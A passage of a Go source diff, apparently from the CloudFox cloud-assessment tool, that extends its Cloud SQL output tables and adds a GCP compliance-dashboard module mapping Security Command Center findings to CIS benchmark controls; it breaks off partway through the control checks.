-325,9 +490,13 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger "State", "Public IP", "Private IP", - "Require SSL", - "Auth Networks", + "SSL", + "Auth Nets", "Backups", + "PITR", + "Encrypt", + "IAM Auth", + "PwdPolicy", "HA", "Issues", } @@ -353,6 +522,14 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger issueDisplay = fmt.Sprintf("%d issues", len(instance.SecurityIssues)) } + // Format encryption type + encryptionDisplay := instance.EncryptionType + if encryptionDisplay == "" { + encryptionDisplay = "Google" + } else if encryptionDisplay == "Google-managed" { + encryptionDisplay = "Google" + } + body = append(body, []string{ instance.ProjectID, instance.Name, @@ -365,6 +542,10 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger boolToYesNo(instance.RequireSSL), authNetworks, boolToYesNo(instance.BackupEnabled), + boolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + boolToYesNo(instance.IAMAuthentication), + boolToYesNo(instance.PasswordPolicyEnabled), instance.AvailabilityType, issueDisplay, }) @@ -416,6 +597,86 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger } } + // Backup configuration table + backupHeader := []string{ + "Instance", + "Project ID", + "Backups", + "PITR", + "Binary Log", + "Retention Days", + "Backup Location", + "Failover Replica", + } + + var backupBody [][]string + for _, instance := range m.Instances { + backupLocation := instance.BackupLocation + if backupLocation == "" { + backupLocation = "Default" + } + failoverReplica := instance.FailoverReplica + if failoverReplica == "" { + failoverReplica = "-" + } + backupBody = append(backupBody, []string{ + instance.Name, + instance.ProjectID, + boolToYesNo(instance.BackupEnabled), + boolToYesNo(instance.PointInTimeRecovery), + boolToYesNo(instance.BinaryLogEnabled), + fmt.Sprintf("%d", instance.RetentionDays), + backupLocation, + failoverReplica, + }) + } + + // Encryption and security configuration table + securityConfigHeader := []string{ + "Instance", + "Project ID", + "Encryption", + "KMS Key", + "IAM Auth", + "Pwd Policy", + "SSL Required", + "SSL Mode", + "Maintenance", + } + + var securityConfigBody [][]string + for _, instance := range m.Instances { + kmsKey := instance.KMSKeyName + if kmsKey == "" { + kmsKey = "-" + } else { + // Truncate long key names + parts := strings.Split(kmsKey, "/") + if len(parts) > 0 { + kmsKey = parts[len(parts)-1] + } + } + maintenanceWindow := instance.MaintenanceWindow + if maintenanceWindow == "" { + maintenanceWindow = "Not set" + } + sslMode := instance.SSLMode + if sslMode == "" { + sslMode = "Default" + } + securityConfigBody = append(securityConfigBody, []string{ + instance.Name, + instance.ProjectID, + instance.EncryptionType, + kmsKey, + boolToYesNo(instance.IAMAuthentication), + boolToYesNo(instance.PasswordPolicyEnabled), + boolToYesNo(instance.RequireSSL), + sslMode, + maintenanceWindow, + }) + } + // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -449,6 +710,20 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger }) } + // Always add backup table (shows backup gaps) + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudsql-backups", + Header: backupHeader, + Body: backupBody, + }) + + // Always add security config table + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudsql-security-config", + Header: securityConfigHeader, + Body: securityConfigBody, + }) + output := CloudSQLOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go new file mode 100644 index 00000000..5a837e5b --- /dev/null +++ b/gcp/commands/compliancedashboard.go @@ -0,0 +1,1815 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" + +var GCPComplianceDashboardCommand = &cobra.Command{ + Use: GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + Aliases: []string{"compliance", "cis", "benchmark"}, + Short: "Assess regulatory compliance against CIS GCP Benchmarks and security frameworks", + Long: `Assess regulatory compliance posture against industry standards and security frameworks. + +Features: +- CIS GCP Foundation Benchmark assessment +- PCI-DSS control mapping +- SOC 2 control coverage analysis +- HIPAA compliance checks +- ISO 27001 control mapping +- Security Command Center compliance findings integration +- Organization policy compliance analysis +- Remediation guidance for failed controls + +Supported Frameworks: +- CIS GCP Foundation Benchmark v1.3/v2.0 +- PCI-DSS v3.2.1/v4.0 +- SOC 2 Type II +- HIPAA Security Rule +- ISO 27001:2013 +- NIST CSF + +Requires appropriate IAM permissions: +- roles/securitycenter.findingsViewer +- roles/orgpolicy.policyViewer +- roles/resourcemanager.organizationViewer`, + Run: runGCPComplianceDashboardCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ComplianceControl struct { + ControlID string + Framework string + ControlName string + Description string + Severity string // CRITICAL, HIGH, MEDIUM, LOW + Status string // PASS, FAIL, MANUAL, NOT_APPLICABLE + ResourceCount int + PassCount int + FailCount int + ProjectID string + Details string + Remediation string + References []string +} + +type ComplianceFramework struct { + Name string + Version string + TotalControls int + PassedControls int + FailedControls int + ManualControls int + NAControls int + Score float64 +} + +type ComplianceFailure struct { + ControlID string + Framework string + ControlName string + Severity string + ResourceName string + ResourceType string + ProjectID string + Details string + Remediation string + RiskScore int +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ComplianceDashboardModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Controls []ComplianceControl + Frameworks map[string]*ComplianceFramework + Failures []ComplianceFailure + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Cached data for compliance checks + orgPolicies map[string]bool + sccFindings map[string][]string // category -> resources + projectMetadata map[string]map[string]interface{} +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ComplianceDashboardOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComplianceDashboardOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComplianceDashboardOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPComplianceDashboardCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &ComplianceDashboardModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Controls: []ComplianceControl{}, + Frameworks: make(map[string]*ComplianceFramework), + Failures: []ComplianceFailure{}, + LootMap: make(map[string]*internal.LootFile), + orgPolicies: make(map[string]bool), + sccFindings: make(map[string][]string), + projectMetadata: make(map[string]map[string]interface{}), + } + + // Initialize loot files + module.initializeLootFiles() + + // Initialize frameworks + module.initializeFrameworks() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Framework Initialization +// ------------------------------ +func (m *ComplianceDashboardModule) initializeFrameworks() { + m.Frameworks["CIS-GCP-1.3"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "1.3", + } + m.Frameworks["CIS-GCP-2.0"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "2.0", + } + m.Frameworks["PCI-DSS-4.0"] = &ComplianceFramework{ + Name: "PCI-DSS", + Version: "4.0", + } + m.Frameworks["SOC2"] = &ComplianceFramework{ + Name: "SOC 2 Type II", + Version: "2017", + } + m.Frameworks["HIPAA"] = &ComplianceFramework{ + Name: "HIPAA Security Rule", + Version: "2013", + } + m.Frameworks["ISO27001"] = &ComplianceFramework{ + Name: "ISO 27001", + Version: "2013", + } + m.Frameworks["NIST-CSF"] = &ComplianceFramework{ + Name: "NIST Cybersecurity Framework", + Version: "1.1", + } +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ComplianceDashboardModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Assessing compliance posture against security frameworks...", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + // Step 1: Gather SCC findings for compliance mapping + m.gatherSCCFindings(ctx, logger) + + // Step 2: Gather organization policies + m.gatherOrgPolicies(ctx, logger) + + // Step 3: Run CIS GCP Benchmark checks + m.runCISBenchmarkChecks(ctx, logger) + + // Step 4: Map to other frameworks + m.mapToFrameworks() + + // Check results + totalControls := len(m.Controls) + if totalControls == 0 { + logger.InfoM("No compliance controls could be assessed", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + logger.InfoM("This could mean: (1) Insufficient permissions, (2) No resources to assess", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + return + } + + // Count by status + passCount := 0 + failCount := 0 + manualCount := 0 + for _, c := range m.Controls { + switch c.Status { + case "PASS": + passCount++ + case "FAIL": + failCount++ + case "MANUAL": + manualCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Assessed %d compliance control(s): %d PASS, %d FAIL, %d MANUAL", + totalControls, passCount, failCount, manualCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + if failCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] %d compliance control(s) failed", failCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Data Gathering +// ------------------------------ +func (m *ComplianceDashboardModule) gatherSCCFindings(ctx context.Context, logger internal.Logger) { + client, err := securitycenter.NewClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Security Command Center client: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } + return + } + defer client.Close() + + for _, projectID := range m.ProjectIDs { + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, + } + + it := client.ListFindings(ctx, req) + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + if result.Finding != nil { + category := result.Finding.Category + m.mu.Lock() + m.sccFindings[category] = append(m.sccFindings[category], result.Finding.ResourceName) + m.mu.Unlock() + } + } + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Gathered %d SCC finding categories", len(m.sccFindings)), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } +} + +func (m *ComplianceDashboardModule) gatherOrgPolicies(ctx context.Context, logger internal.Logger) { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Resource Manager client: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } + return + } + + for _, projectID := range m.ProjectIDs { + project, err := crmService.Projects.Get(projectID).Do() + if err != nil { + continue + } + + m.mu.Lock() + m.projectMetadata[projectID] = map[string]interface{}{ + "name": project.Name, + "parent": project.Parent, + "labels": project.Labels, + } + m.mu.Unlock() + } +} + +// ------------------------------ +// CIS Benchmark Checks +// ------------------------------ +func (m *ComplianceDashboardModule) runCISBenchmarkChecks(ctx context.Context, logger internal.Logger) { + // CIS GCP Foundation Benchmark v1.3 / v2.0 Controls + + // Section 1: Identity and Access Management + m.checkCIS_1_1_ServiceAccountAdmin(ctx, logger) + m.checkCIS_1_2_ServiceAccountUser(ctx, logger) + m.checkCIS_1_3_ServiceAccountKeys(ctx, logger) + m.checkCIS_1_4_ServiceAccountTokenCreator(ctx, logger) + m.checkCIS_1_5_SeperationOfDuties(ctx, logger) + m.checkCIS_1_6_KMSRoles(ctx, logger) + m.checkCIS_1_7_SAKeyRotation(ctx, logger) + m.checkCIS_1_8_UserManagedKeys(ctx, logger) + m.checkCIS_1_9_CloudKMSSeparation(ctx, logger) + m.checkCIS_1_10_APIKeys(ctx, logger) + + // Section 2: Logging and Monitoring + m.checkCIS_2_1_CloudAuditLogging(ctx, logger) + m.checkCIS_2_2_LogSinks(ctx, logger) + m.checkCIS_2_3_RetentionPolicy(ctx, logger) + m.checkCIS_2_4_ProjectOwnership(ctx, logger) + m.checkCIS_2_5_AuditConfigChanges(ctx, logger) + m.checkCIS_2_6_SQLInstanceChanges(ctx, logger) + m.checkCIS_2_7_NetworkChanges(ctx, logger) + m.checkCIS_2_8_RouteChanges(ctx, logger) + m.checkCIS_2_9_FirewallChanges(ctx, logger) + m.checkCIS_2_10_VPCChanges(ctx, logger) + m.checkCIS_2_11_SQLServerAccessChanges(ctx, logger) + + // Section 3: Networking + m.checkCIS_3_1_DefaultNetwork(ctx, logger) + m.checkCIS_3_2_LegacyNetworks(ctx, logger) + m.checkCIS_3_3_DNSSEC(ctx, logger) + m.checkCIS_3_4_RSASHA1(ctx, logger) + m.checkCIS_3_5_RDPAccess(ctx, logger) + m.checkCIS_3_6_SSHAccess(ctx, logger) + m.checkCIS_3_7_FlowLogs(ctx, logger) + m.checkCIS_3_8_SSLPolicy(ctx, logger) + m.checkCIS_3_9_FirewallLogging(ctx, logger) + m.checkCIS_3_10_VPCNetworkPeering(ctx, logger) + + // Section 4: Virtual Machines + m.checkCIS_4_1_DefaultServiceAccount(ctx, logger) + m.checkCIS_4_2_BlockProjectWideSSH(ctx, logger) + m.checkCIS_4_3_OSLogin(ctx, logger) + m.checkCIS_4_4_SerialPortDisabled(ctx, logger) + m.checkCIS_4_5_IPForwarding(ctx, logger) + m.checkCIS_4_6_PublicIP(ctx, logger) + m.checkCIS_4_7_ShieldedVM(ctx, logger) + m.checkCIS_4_8_ComputeEncryption(ctx, logger) + m.checkCIS_4_9_ConfidentialComputing(ctx, logger) + + // Section 5: Storage + m.checkCIS_5_1_UniformBucketAccess(ctx, logger) + m.checkCIS_5_2_PublicBuckets(ctx, logger) + + // Section 6: Cloud SQL + m.checkCIS_6_1_SQLPublicIP(ctx, logger) + m.checkCIS_6_2_SQLAuthorizedNetworks(ctx, logger) + m.checkCIS_6_3_SQLSSLRequired(ctx, logger) + m.checkCIS_6_4_SQLNoPublicIP(ctx, logger) + m.checkCIS_6_5_SQLBackups(ctx, logger) + m.checkCIS_6_6_SQLContainedDB(ctx, logger) + m.checkCIS_6_7_SQLCrossDBAOwnership(ctx, logger) + + // Section 7: BigQuery + m.checkCIS_7_1_BigQueryCMEK(ctx, logger) + m.checkCIS_7_2_BigQueryTableCMEK(ctx, logger) + m.checkCIS_7_3_BigQueryDatasetPublic(ctx, logger) +} + +// CIS Control Check Implementations +func (m *ComplianceDashboardModule) checkCIS_1_1_ServiceAccountAdmin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Admin is not assigned at project level", + Description: "The Service Account Admin role should not be assigned at the project level", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review IAM bindings and remove Service Account Admin role at project level", + References: []string{"https://cloud.google.com/iam/docs/understanding-roles"}, + } + + // Check SCC findings for this category + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_ADMIN_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account Admin role", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "iam-binding", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_2_ServiceAccountUser(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account User is not assigned at project level", + Description: "Service Account User role grants impersonation capabilities and should be restricted", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Remove Service Account User role at project level, assign at service account level instead", + References: []string{"https://cloud.google.com/iam/docs/service-accounts"}, + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_USER_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account User role", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_3_ServiceAccountKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are not created", + Description: "User-managed keys are a security risk and should be avoided", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use workload identity or short-lived tokens instead of user-managed keys", + References: []string{"https://cloud.google.com/iam/docs/best-practices-for-securing-service-accounts"}, + } + + if findings, ok := m.sccFindings["USER_MANAGED_SERVICE_ACCOUNT_KEY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d user-managed service account keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "service-account-key", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_4_ServiceAccountTokenCreator(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Token Creator is properly scoped", + Description: "Token Creator role allows identity impersonation and should be carefully controlled", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review and restrict Service Account Token Creator role assignments", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_5_SeperationOfDuties(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure separation of duties is enforced", + Description: "Users should not have both Service Account Admin and Service Account User roles", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement separation of duties by assigning roles to different principals", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_6_KMSRoles(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure KMS encryption and decryption roles are separated", + Description: "KMS admin should not have encryption/decryption access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Separate KMS administration from encryption/decryption operations", + } + + if findings, ok := m.sccFindings["KMS_ROLE_SEPARATION"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_7_SAKeyRotation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure service account keys are rotated within 90 days", + Description: "Service account keys should be rotated regularly", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement key rotation policy or use short-lived credentials", + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_KEY_NOT_ROTATED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d service account keys older than 90 days", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_8_UserManagedKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are reviewed", + Description: "All user-managed keys should be inventoried and reviewed", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Document and regularly review all user-managed service account keys", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_9_CloudKMSSeparation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud KMS cryptokeys are not anonymously or publicly accessible", + Description: "KMS keys should not be accessible to allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from Cloud KMS keys", + } + + if findings, ok := m.sccFindings["KMS_KEY_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible KMS keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "kms-key", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_10_APIKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure API keys are restricted to only APIs and hosts that need them", + Description: "API keys should have appropriate restrictions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Apply API and host restrictions to all API keys", + } + + if findings, ok := m.sccFindings["API_KEY_NOT_RESTRICTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d unrestricted API keys", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 2: Logging and Monitoring Controls +func (m *ComplianceDashboardModule) checkCIS_2_1_CloudAuditLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Audit Logging is configured properly", + Description: "Cloud Audit Logs should be enabled for all services", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable Data Access audit logs for all services", + } + + if findings, ok := m.sccFindings["AUDIT_LOGGING_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d services with disabled audit logging", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_2_LogSinks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts exist for audit configuration changes", + Description: "Alerts should be configured for audit configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics and alerts for audit config changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_3_RetentionPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log bucket has retention policy with appropriate duration", + Description: "Log buckets should have retention policies configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Configure retention policies on all log storage buckets", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_4_ProjectOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for project ownership changes", + Description: "Alerts for project ownership changes should be configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for project ownership assignment changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_5_AuditConfigChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for audit configuration changes", + Description: "Monitor changes to audit configurations", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics for audit configuration changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_6_SQLInstanceChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for SQL instance configuration changes", + Description: "Monitor Cloud SQL instance configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL configuration changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_7_NetworkChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network changes", + Description: "Monitor VPC network creation, deletion, and modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC network changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_8_RouteChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC route changes", + Description: "Monitor VPC route modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC route changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_9_FirewallChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for firewall rule changes", + Description: "Monitor firewall rule creation, modification, and deletion", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for firewall rule changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_10_VPCChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network firewall changes", + Description: "Monitor VPC firewall changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC firewall changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_11_SQLServerAccessChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.11", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for Cloud SQL Server access changes", + Description: "Monitor Cloud SQL authorization changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL authorization modifications", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 3: Networking Controls +func (m *ComplianceDashboardModule) checkCIS_3_1_DefaultNetwork(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default network does not exist", + Description: "The default network should be deleted as it has overly permissive firewall rules", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Delete the default network and create custom VPC networks", + } + + if findings, ok := m.sccFindings["DEFAULT_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d projects with default network", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "vpc-network", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_2_LegacyNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure legacy networks do not exist", + Description: "Legacy networks lack granular subnet control and should not be used", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Migrate from legacy networks to VPC networks", + } + + if findings, ok := m.sccFindings["LEGACY_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_3_DNSSEC(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure DNSSEC is enabled for Cloud DNS", + Description: "DNSSEC protects against DNS spoofing attacks", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable DNSSEC for all Cloud DNS managed zones", + } + + if findings, ok := m.sccFindings["DNSSEC_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_4_RSASHA1(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.4", + Framework: 